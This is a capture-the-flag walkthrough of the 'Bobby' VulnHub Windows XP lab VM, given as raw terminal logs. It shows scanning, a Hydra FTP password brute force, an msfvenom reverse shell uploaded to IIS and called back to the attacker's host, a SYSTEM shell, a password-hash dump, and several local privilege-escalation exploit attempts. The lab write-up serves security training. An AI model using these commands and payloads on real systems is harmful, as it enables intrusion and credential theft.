====================================================================================
Walkthrough of the Bobby VulnHub Windows VM CTF 
====================================================================================

Step 1. Scanning & Enumeration (Nmap + Nikto + Dirb + Searchsploit)

Step 2. Gaining access and privesc to SYSTEM

        Method 1
	--------
	Step 1. Bruteforce FTP creds using the information contained in the blog page's source code
	Step 2. Upload a Metasploit reverse shell (.ASP) in the 'wwwroot' folder via the FTP server
	Step 3. Execute the Metasploit reverse shell via the IIS Web server and get a 'SYSTEM' shell

	Method 2
	--------
	Step 1. Brute-force FTP creds using the information contained in the blog page's source code
	Step 2. Upload a Metasploit reverse shell (.EXE) in the 'wwwroot' folder via the FTP server
	Step 3. Execute the Metasploit reverse shell via the IIS Web server and get a LIMITED shell as 'BOBBY\IUSR_BOBBY'
	     
	Notes: The steps below have not been tested because I have a Windows activation failure...
               > Add a local port forward (3389) and use RDP to login as bob and see if we have more privileges (e.g. SeAssignPrimaryToken or SeDebug). Then try msf 'getsystem' or hot potato exploit. 
               > Add a local port forward (445) and use wmiexec or psexec to execute OS command as bob to see if we have more privileges (e.g. SeAssignPrimaryToken or SeDebug). Then try msf 'getsystem' 		or hot potato exploit

	       I tried to exploit the vulnerability "ms08_067_netapi" (with a local port forward '445') and it did not worked but after disabling the firewall as SYSTEM I retested it and it worked.
	       Clearly exploits like these don't work well with a "port forward"...
	    

====================================================================================
Step 1. Scanning & Enumeration (Nmap + Nikto + Dirb + Searchsploit)
====================================================================================

root@Security-Audit-01:~# nmap -T5 -sS -sV -sC -p- 192.168.1.11
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-09 01:00 CEST
Nmap scan report for 192.168.1.11
Host is up (0.00024s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE VERSION
21/tcp  open   ftp     Microsoft ftpd
80/tcp  open   http    Microsoft IIS httpd 5.1
|_http-generator: MSHTML 8.00.6001.19154
| http-methods: 
|_  Potentially risky methods: TRACE PUT DELETE
|_http-title: TheXero-01
443/tcp closed https
MAC Address: 08:00:27:BD:98:22 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.15 seconds

====================================================================================

root@Security-Audit-01:~# nmap -T5 -sV --script vuln -p 21,80 192.168.1.11
Starting Nmap 7.70 ( https://nmap.org ) at 2018-09-09 01:03 CEST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.1.11
Host is up (0.00027s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
|_sslv2-drown: 
80/tcp open  http    Microsoft IIS httpd 5.1
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /printers/: Potentially interesting folder (401 Access Denied)
|_http-server-header: Microsoft-IIS/5.1
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
MAC Address: 08:00:27:BD:98:22 (Oracle VirtualBox virtual NIC)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.07 seconds

========================================================================================

root@Security-Audit-01:~# nikto -h http://192.168.1.11 -c ALL
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.11
+ Target Hostname:    192.168.1.11
+ Target Port:        80
+ Start Time:         2018-09-09 01:11:43 (GMT2)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/5.1
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, PUT, DELETE 
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-877: HTTP TRACK method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /localstart.asp: This may be interesting...
+ /portal/changelog: Vignette richtext HTML editor changelog found.
+ 7684 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time:           2018-09-09 01:12:01 (GMT2) (18 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


NOTE: "http://192.168.1.11/localstart.asp" is a fucking dead end / rabbit hole...

========================================================================================

root@Security-Audit-01:~# dirb http://192.168.1.11

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Sep  9 01:12:40 2018
URL_BASE: http://192.168.1.11/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.1.11/ ----
+ http://192.168.1.11/_vti_bin/_vti_adm/admin.dll (CODE:500|SIZE:100)                                          
+ http://192.168.1.11/_vti_bin/_vti_aut/author.dll (CODE:500|SIZE:100)                                         
+ http://192.168.1.11/_vti_bin/shtml.dll (CODE:500|SIZE:100)                                                   
+ http://192.168.1.11/iisadmin (CODE:403|SIZE:4083)                                                            
+ http://192.168.1.11/index.html (CODE:200|SIZE:1228)                                                          
+ http://192.168.1.11/printers (CODE:401|SIZE:4431)                                                            
                                                                                                               
-----------------
END_TIME: Sun Sep  9 01:12:45 2018
DOWNLOADED: 4612 - FOUND: 6

========================================================================================

root@Security-Audit-01:~/Desktop/CTFs/Bobby# searchsploit IIS 5.1
----------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                         |  Path
                                                                       | (/usr/share/exploitdb/)
----------------------------------------------------------------------- ----------------------------------------
Microsoft IIS 2.0/3.0/4.0/5.0/5.1 - Internal IP Address Disclosure     | exploits/windows/remote/20096.txt
Microsoft IIS 4.0 / Microsoft JET 3.5/3.5.1 Database Engine - VBA      | exploits/multiple/dos/19228.pl
Microsoft IIS 4.0/5.0/5.1 - Authentication Method Disclosure           | exploits/windows/remote/21313.txt
Microsoft IIS 5.0 < 5.1 - Remote Denial of Service                     | exploits/windows/dos/35.c
Microsoft IIS 5.1 - Hit Highlighting Authentication Bypass             | exploits/windows/remote/4016.sh
Microsoft IIS 5.1 - WebDAV HTTP Request Source Code Disclosure         | exploits/windows/remote/26230.txt
----------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result


========================================================================================

Failed exploitation attemp - Web server misconfiguration - PUT http method
---------------------------------------------------------------------------

=> I verified manually the information given by Nikto about the PUT method allow

curl -v -X OPTIONS http://192.168.1.11/
*   Trying 192.168.1.11...
* TCP_NODELAY set
* Connected to 192.168.1.11 (192.168.1.11) port 80 (#0)
> OPTIONS / HTTP/1.1
> Host: 192.168.1.11
> User-Agent: curl/7.60.0
> Accept: */*

< HTTP/1.1 200 OK
< Server: Microsoft-IIS/5.1
< Date: Sun, 09 Sep 2018 08:14:50 GMT
< Public: OPTIONS, TRACE, GET, HEAD, POST
< Allow: OPTIONS, TRACE, GET, HEAD, PUT, DELETE
< Content-Length: 0
< 
* Connection #0 to host 192.168.1.11 left intact


=> I tried to upload manually an ASP webshell using CURL but it failed (403)


> 2 basic ASP webshells are available in KALI in the directory: "/usr/share/webshells/asp/"

  root@Security-Audit-01:/usr/share/webshells/asp# ls -al
  -rw-r--r-- 1 root root 1200 Aug 18  2015 cmd-asp-5.1.asp
  -rw-r--r-- 1 root root 1526 Aug 18  2015 cmdasp.asp

> root@Security-Audit-01:~/Desktop/CTFs/Bobby# curl -v -T cmdasp.asp http://192.168.1.11/
*   Trying 192.168.1.11...
* TCP_NODELAY set
* Connected to 192.168.1.11 (192.168.1.11) port 80 (#0)
> PUT /cmdasp.asp HTTP/1.1
> Host: 192.168.1.11
> User-Agent: curl/7.60.0
> Accept: */*
> Content-Length: 1526
> Expect: 100-continue

< HTTP/1.1 403 Access Forbidden
< Server: Microsoft-IIS/5.1
< Date: Sun, 09 Sep 2018 08:25:35 GMT
< Connection: close
< Content-Length: 4126
< Content-Type: text/html
< 
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>

<SNIP>
You have attempted to execute a CGI, ISAPI, or other executable program from a directory that does not allow programs to be executed.</p>
<SNIP>
* Closing connection 0


========================================================================================
Step 2. Gaining access and privesc to SYSTEM
========================================================================================

When I browsed the website I found the following information in the main page's source code:

> Bobby's blog
> Welcome to my personal blogging website but here are a few things about me
=> Favourite film: Matrix reloaded
=> Favourite music artist: Daft Punk
=> Favourite os: Windows 3.1
=> <!-- Bobby sounds more 'me', not Robert/Bob. -->


Creation of 2 files: Login.txt and Pwd.txt
============================================

root@Security-Audit-01:~/Desktop/CTFs/Bobby# cat Login.txt 
Bobby
bobby
Robert
robert
Bob
bob
Neo
neo
Morpheus
morpheus
Oracle
oracle

root@Security-Audit-01:~/Desktop/CTFs/Bobby# cat Pwd.txt 
Good_job_:)
Pass.txt
neo
NEO
Neo
Morpheus
Oracle
oracle
ORACLE
bob
robert
bobby
Matrix
matrix
trinity
TRINITY
MORPHEUS
Darlin'
morpheus
daft
Daft
Punk
Daft Club
punk
Cindy so Loud
Rollin' and Scratchin'
Human After All
Alive 1997
Alive
1997
Cindy
cindy
so loud
discovery
Discovery
homework
Homework
da funk
DA FUNK
Da Funk
Da funk
Thomas Bangalter
Thomas
thomas
bangalter
Bangalter
Guy-Manuel
Homem-Christo
TheXero-01
smith


FTP bruteforce attack using Hydra
==================================

root@Security-Audit-01:~/Desktop/CTFs/Bobby# hydra -L Login.txt -P Pwd.txt ftp://192.168.1.11:21

Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-09-09 02:44:53
[DATA] max 16 tasks per 1 server, overall 16 tasks, 612 login tries (l:12/p:51), ~39 tries per task
[DATA] attacking ftp://192.168.1.11:21/
[21][ftp] host: 192.168.1.11   login: Bob   password: Matrix
[21][ftp] host: 192.168.1.11   login: bob   password: Matrix
1 of 1 target successfully completed, 2 valid passwords found
[WARNING] Writing restore file because 6 final worker threads did not complete until end.
[ERROR] 6 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2018-09-09 02:45:05


Login to the FTP server using 'bob:Matrix'
==========================================

root@Security-Audit-01:~/Desktop/CTFs/Bobby# ftp 192.168.1.11 21
Connected to 192.168.1.11.
220 Microsoft FTP Service
Name (192.168.1.11:root): bob
331 Password required for bob.
Password:
230 User bob logged in.
Remote system type is Windows_NT.

ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
07-17-18  10:47PM       <DIR>          AdminScripts
06-18-18  03:51PM       <DIR>          ftproot
06-18-18  03:51PM       <DIR>          iissamples
06-18-18  03:51PM       <DIR>          Scripts
07-17-18  11:09PM       <DIR>          wwwroot
226 Transfer complete.

ftp> cd wwwroot
250 CWD command successful.

ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
12-08-11  01:56PM               272367 backgroup.jpg
12-10-11  02:55PM                  101 hint.html
02-12-13  12:46PM                 1228 index.html
226 Transfer complete.

ftp> get hint.html
local: hint.html remote: hint.html
200 PORT command successful.
150 Opening ASCII mode data connection for hint.html(101 bytes).
226 Transfer complete.
101 bytes received in 0.00 secs (888.5839 kB/s)

root@Security-Audit-01:~/Desktop/CTFs/Bobby# cat hint.html 
#1 This very common Windows file is not downloaded or interpretered but rather executed server side


Creation of an ASP reverse shell with Metasploit
==================================================

root@Security-Audit-01:~/Desktop/CTFs/Bobby# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=80 -f asp > Reverseshell.asp
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of asp file: 38415 bytes


Upload of the ASP reverse shell
=================================

ftp> put Reverseshell.asp
local: Reverseshell.asp remote: Reverseshell.asp
200 PORT command successful.
150 Opening ASCII mode data connection for Reverseshell.asp.
226 Transfer complete.
38485 bytes sent in 0.00 secs (81.3795 MB/s)

ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
12-08-11  01:56PM               272367 backgroup.jpg
12-10-11  02:55PM                  101 hint.html
02-12-13  12:46PM                 1228 index.html
09-09-18  02:25AM                38485 Reverseshell.asp
226 Transfer complete.
ftp> 


Start a Metasploit handler
=========================

root@Security-Audit-01:~/Desktop/CTFs/Bobby# msfconsole
       =[ metasploit v4.17.1-dev                          ]
+ -- --=[ 1788 exploits - 1018 auxiliary - 310 post       ]
+ -- --=[ 538 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler 
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.8
LHOST => 192.168.1.8
msf exploit(multi/handler) > set LPORT 80
LPORT => 80
msf exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.8      yes       The listen address (an interface may be specified)
   LPORT     80               yes       The listen port

Exploit target:
   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.8:80 



Execution of the ASP reverse shell
====================================

=> We browse "http://192.168.1.11/Reverseshell.asp" with Firefox
   Or do "curl http://192.168.1.11/Reverseshell.asp"

=> We got a reverseshell with SYSTEM privileges


msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.8:80 
[*] Sending stage (179779 bytes) to 192.168.1.11
[*] Meterpreter session 6 opened (192.168.1.8:80 -> 192.168.1.11:1043) at 2018-09-09 03:05:54 +0200

meterpreter > sysinfo
Computer        : BOBBY
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM


meterpreter > getprivs

Enabled Process Privileges
==========================

Name
----
SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeCreateTokenPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeLoadDriverPrivilege
SeLockMemoryPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTcbPrivilege
SeUndockPrivilege

meterpreter > shell
Process 1592 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user
net user

User accounts for \\
-------------------------------------------------------------------------------
Administrator            bob                      Guest                    
HelpAssistant            IUSR_BOBBY               IWAM_BOBBY               
jfc                      SUPPORT_388945a0         
The command completed with one or more errors.


C:\WINDOWS\system32>meterpreter > dir

meterpreter > cd /

meterpreter > dir
Listing: C:\
============

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
100777/rwxrwxrwx  0         fil   2018-06-19 00:49:09 +0200  AUTOEXEC.BAT
100666/rw-rw-rw-  0         fil   2018-06-19 00:49:09 +0200  CONFIG.SYS
40777/rwxrwxrwx   0         dir   2018-07-18 08:18:13 +0200  Documents and Settings
100444/r--r--r--  0         fil   2018-06-19 00:49:09 +0200  IO.SYS
40777/rwxrwxrwx   0         dir   2018-07-18 07:40:36 +0200  Inetpub
100444/r--r--r--  0         fil   2018-06-19 00:49:09 +0200  MSDOS.SYS
100555/r-xr-xr-x  47564     fil   2008-04-14 14:00:00 +0200  NTDETECT.COM
40555/r-xr-xr-x   0         dir   2018-06-19 00:52:39 +0200  Program Files
40777/rwxrwxrwx   0         dir   2018-06-19 00:51:04 +0200  System Volume Information
40777/rwxrwxrwx   0         dir   2018-06-19 00:52:48 +0200  WINDOWS
100666/rw-rw-rw-  210       fil   2018-06-19 00:47:12 +0200  boot.ini
100444/r--r--r--  250048    fil   2008-04-14 14:00:00 +0200  ntldr
0274/-w-rwxr--    11271344  fif   1970-01-01 01:00:00 +0100  pagefile.sys

meterpreter > cd Inetpub

meterpreter > ls
Listing: C:\Inetpub
===================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2018-07-18 07:47:33 +0200  AdminScripts
40777/rwxrwxrwx  0     dir   2018-06-19 00:51:26 +0200  Scripts
40777/rwxrwxrwx  0     dir   2018-06-19 00:51:32 +0200  ftproot
40777/rwxrwxrwx  0     dir   2018-06-19 00:51:26 +0200  iissamples
40777/rwxrwxrwx  0     dir   2018-09-09 12:16:31 +0200  wwwroot

meterpreter > cd '/Documents and Settings/Administrator/Desktop'

meterpreter > ls
Listing: C:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  32    fil   2013-02-04 23:25:26 +0100  secret.txt

meterpreter > cat secret.txt
ab74f8217d5619acb2b708c7bdc50748

meterpreter > hashdump
Administrator:500:921988ba001dc8e1e1c7c53891cb0efa:e1270db1dd8bf1e32725729695aa1feb:::
bob:1003:66e5d5ae82299cb6aad3b435b51404ee:42865c72994c34e54d4c5d659fc15b10:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:21914bdd3ced42f0a1a9bb95eff8d64a:aa80a94893c319b5b350c01b92030eba:::
IUSR_BOBBY:1004:c29ac124233f9df7f2615d1bd8b9772a:de6c27817e779a8fd54e477b4e8a3d9e:::
IWAM_BOBBY:1005:dfd409a57ff174a6c8e1ea48902104c8:bcbc9addc7e8e70558a8f6b935c87ae2:::
jfc:1006:ba38a7a6bfac2ac5aad3b435b51404ee:0d8f94d40c00e194ce907271faa40a28:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:cd04b3227b6ebce93abfeff627d9724f:::

meterpreter > ps

Process List
============
 PID   PPID  Name              Arch  Session  User                          Path
 ---   ----  ----              ----  -------  ----                          ----
 0     0     [System Process]                                               
 4     0     System            x86   0        NT AUTHORITY\SYSTEM           
 352   4     smss.exe          x86   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 572   352   csrss.exe         x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\csrss.exe
 596   352   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM           \??\C:\WINDOWS\system32\winlogon.exe
 676   596   services.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\services.exe
 688   596   lsass.exe         x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\lsass.exe
 848   676   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\svchost.exe
 868   676   alg.exe           x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\System32\alg.exe
 924   676   svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1040  676   svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\System32\svchost.exe
 1096  676   svchost.exe       x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\svchost.exe
 1168  1896  svchost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\Temp\rad55A28.tmp\svchost.exe
 1200  676   svchost.exe       x86   0        NT AUTHORITY\LOCAL SERVICE    C:\WINDOWS\system32\svchost.exe
 1256  596   logonui.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\logonui.exe
 1376  676   spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\spoolsv.exe
 1736  596   logon.scr         x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\logon.scr
 1896  676   inetinfo.exe      x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\inetsrv\inetinfo.exe
 1928  676   dllhost.exe       x86   0        NT AUTHORITY\SYSTEM           C:\WINDOWS\system32\dllhost.exe

meterpreter > 


==========================
Other tests - Method 2
==========================

If we upload an ".EXE" reverse shell we got only a limited shell...
===================================================================

root@Security-Audit-01:~/Desktop/CTFs/Bobby# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=80 -f exe > Reverseshell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes

ftp> binary
200 Type set to I.
ftp> put Reverseshell.exe 
local: Reverseshell.exe remote: Reverseshell.exe
200 PORT command successful.
150 Opening BINARY mode data connection for Reverseshell.exe.
226 Transfer complete.
73802 bytes sent in 0.00 secs (172.5075 MB/s)

ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
12-08-11  01:56PM               272367 backgroup.jpg
12-10-11  02:55PM                  101 hint.html
02-12-13  12:46PM                 1228 index.html
09-09-18  02:25AM                38485 Reverseshell.asp
09-09-18  02:55AM                73802 Reverseshell.exe
226 Transfer complete.
ftp> 

root@Security-Audit-01:~/Desktop/CTFs/Bobby# curl http://192.168.1.11/Reverseshell.exe


msf exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.1.8:80 
[*] Sending stage (179779 bytes) to 192.168.1.11
[*] Meterpreter session 5 opened (192.168.1.8:80 -> 192.168.1.11:1039) at 2018-09-09 02:56:40 +0200

meterpreter > getuid
Server username: BOBBY\IUSR_BOBBY

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)


meterpreter > getprivs

Enabled Process Privileges
==========================
Name
----
SeChangeNotifyPrivilege
SeShutdownPrivilege
SeUndockPrivilege


meterpreter > ps

Process List
============
 PID   PPID  Name              Arch  Session  User              Path
 ---   ----  ----              ----  -------  ----              ----
 0     0     [System Process]                                   
 4     0     System                                             
 352   4     smss.exe                                           
 572   352   csrss.exe                                          
 596   352   winlogon.exe                                       
 676   596   services.exe                                       
 688   596   lsass.exe                                          
 848   676   svchost.exe                                        
 868   676   alg.exe                                            
 924   676   svchost.exe                                        
 1040  676   svchost.exe                                        
 1096  676   svchost.exe                                        
 1200  676   svchost.exe                                        
 1236  1896  Reverseshell.exe  x86   0        BOBBY\IUSR_BOBBY  \\?\c:\inetpub\wwwroot\Reverseshell.exe
 1256  596   logonui.exe                                        
 1376  676   spoolsv.exe                                        
 1736  596   logon.scr                                          
 1896  676   inetinfo.exe                                       
 1928  676   dllhost.exe      

meterpreter > migrate 848
[*] Migrating from 648 to 848...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)

meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
[-] stdapi_sys_process_execute: Operation failed: Access is denied.

meterpreter > execute -f cmd.exe -i
Process 1684 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

c:\inetpub\wwwroot>net user
net user
Access is denied.

meterpreter >
meterpreter > background
[*] Backgrounding session 5...
msf exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf post(multi/recon/local_exploit_suggester) > set session 10
session => 10
msf post(multi/recon/local_exploit_suggester) > run

[*] 192.168.1.11 - Collecting local exploits for x86/windows...
[*] 192.168.1.11 - 39 exploit checks are being tried...
[+] 192.168.1.11 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 192.168.1.11 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.1.11 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.1.11 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 192.168.1.11 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 192.168.1.11 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

msf post(multi/recon/local_exploit_suggester) > back


------------------------------------------------------------
Test of "exploit/windows/local/ms14_058_track_popup_menu"

=> Windows TrackPopupMenu Win32k NULL Pointer Dereference
=> This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. 

msf exploit(multi/handler) > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(windows/local/ms14_058_track_popup_menu) > show targets

Exploit targets:
   Id  Name
   --  ----
   0   Windows x86
   1   Windows x64

msf exploit(windows/local/ms14_058_track_popup_menu) > set targets 0
targets => 0

msf exploit(windows/local/ms14_058_track_popup_menu) > options

Module options (exploit/windows/local/ms14_058_track_popup_menu):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Exploit target:
   Id  Name
   --  ----
   0   Windows x86

msf exploit(windows/local/ms14_058_track_popup_menu) > set session 11
session => 11
msf exploit(windows/local/ms14_058_track_popup_menu) > run

[*] Started reverse TCP handler on 192.168.1.8:4444 
[*] Launching notepad to host the exploit...
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
msf exploit(windows/local/ms14_058_track_popup_menu) > 

------------------------------------------------------------
Test of local port forward 3389

meterpreter > portfwd add -l 3389 -p 3389 -r 127.0.0.1
[*] Local TCP relay created: :3389 <-> 127.0.0.1:3389

root@Security-Audit-01:~/Desktop/CTFs/Bobby# rdesktop -u bob -p Matrix 127.0.0.1:3389
Autoselected keyboard map en-us
WARNING: Remote desktop does not support colour depth 24; falling back to 16

It works => the remote desktop console is opened BUT I have to activate Windows and the activation fails


------------------------------------------------------------
Test of local port forward 445 + "ms08_067_netapi"

meterpreter > portfwd add -l 445 -p 445 -r 127.0.0.1
[*] Local TCP relay created: :445 <-> 127.0.0.1:445

meterpreter > background
[*] Backgrounding session 26...

msf exploit(multi/handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > exploit

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[-] 127.0.0.1:445 - Exploit failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_OBJECT_NAME_NOT_FOUND (Command=162 WordCount=0)
[*] Exploit completed, but no session was created.


use exploit/multi/handler

portfwd add -l 445 -p 445 -r 0.0.0.0

------------------------------------------------------------
Test of "MS11-046"

meterpreter > dir
Listing: c:\inetpub\wwwroot
===========================

ftp> binary
200 Type set to I.
ftp> put ms11-046.exe
local: ms11-046.exe remote: ms11-046.exe
200 PORT command successful.
150 Opening BINARY mode data connection for ms11-046.exe.
226 Transfer complete.
112815 bytes sent in 0.00 secs (84.2512 MB/s)

meterpreter > dir
dir
Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  38415   fil   2018-09-09 12:05:23 +0200  Reverseshell.asp
100777/rwxrwxrwx  73802   fil   2018-09-09 11:55:23 +0200  Reverseshell.exe
100666/rw-rw-rw-  272367  fil   2011-12-08 21:56:25 +0100  backgroup.jpg
100777/rwxrwxrwx  389120  fil   2018-09-09 13:32:35 +0200  cmd.exe
100666/rw-rw-rw-  101     fil   2011-12-10 22:55:32 +0100  hint.html
100666/rw-rw-rw-  1228    fil   2013-02-12 20:46:58 +0100  index.html
100777/rwxrwxrwx  112815  fil   2018-09-09 13:57:21 +0200  ms11-046.exe

meterpreter > execute -f cmd.exe -i
Process 548 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

c:\inetpub\wwwroot>ms11-046.exe
ms11-046.exe
[*] MS11-046 (CVE-2011-1249) x86 exploit
   [*] by Tomislav Paskalev
[*] Identifying OS
   [+] 32-bit
   [+] Windows XP SP3
[*] Locating required OS components
   [+] ntoskrnl.exe
      [*] Address:      0x804d7000
      [*] Offset:       0000000000
      [-] Could not find HalDispatchTable


------------------------------------------------------------
Test of "/exploit/windows/local/ppr_flatten_rec"

msf exploit(windows/local/ppr_flatten_rec) > exploit

[*] Started reverse TCP handler on 192.168.1.8:4444 
[*] Launching notepad to host the exploit...
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.


